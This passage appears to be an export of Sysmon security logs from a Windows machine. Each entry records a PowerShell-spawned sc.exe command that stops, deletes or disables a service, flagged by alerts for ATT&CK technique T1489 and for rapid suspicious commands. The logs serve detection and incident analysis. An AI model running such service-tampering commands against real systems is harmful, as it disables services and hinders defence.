Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.140"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-00101b983000}"",""processId"":""4544"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Sncryption Media Playeq\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.348",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.090 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-0010c5953000} +ProcessId: 3496 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""NetMsmqActiv Media NVIDIA"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.093465300Z"",""eventRecordID"":""3808"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.090\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-0010c5953000}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.090"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-0010c5953000}"",""processId"":""3496"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""NetMsmqActiv Media NVIDIA\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.296",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.050 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-00108d933000} +ProcessId: 5944 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete RpcEptManger +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete RpcEptManger",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.053341500Z"",""eventRecordID"":""3806"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.050\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-00108d933000}\r\nProcessId: 5944\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete RpcEptManger\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.050"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-00108d933000}"",""processId"":""5944"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete RpcEptManger"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.275",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.036 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-0010bd923000} +ProcessId: 3252 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop RpcEptManger +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.039946200Z"",""eventRecordID"":""3805"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.036\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-0010bd923000}\r\nProcessId: 3252\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.036"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-0010bd923000}"",""processId"":""3252"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop RpcEptManger"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.200",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:34.986 +ProcessGuid: {df9fc3d3-b412-5ecf-0000-0010d48f3000} +ProcessId: 6016 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.993340900Z"",""eventRecordID"":""3802"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:34.986\r\nProcessGuid: {df9fc3d3-b412-5ecf-0000-0010d48f3000}\r\nProcessId: 6016\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:34.986"",""processGuid"":""{df9fc3d3-b412-5ecf-0000-0010d48f3000}"",""processId"":""6016"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.108",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:34.923 +ProcessGuid: {df9fc3d3-b412-5ecf-0000-00103e8d3000} +ProcessId: 1012 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp64 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.925813300Z"",""eventRecordID"":""3799"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:34.923\r\nProcessGuid: {df9fc3d3-b412-5ecf-0000-00103e8d3000}\r\nProcessId: 1012\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:34.923"",""processGuid"":""{df9fc3d3-b412-5ecf-0000-00103e8d3000}"",""processId"":""1012"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp64"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.092",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:34.872 +ProcessGuid: {df9fc3d3-b412-5ecf-0000-0010288a3000} +ProcessId: 6676 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinHelp64 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHelp64 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.873980100Z"",""eventRecordID"":""3798"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:34.872\r\nProcessGuid: {df9fc3d3-b412-5ecf-0000-0010288a3000}\r\nProcessId: 6676\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHelp64 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:34.872"",""processGuid"":""{df9fc3d3-b412-5ecf-0000-0010288a3000}"",""processId"":""6676"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® 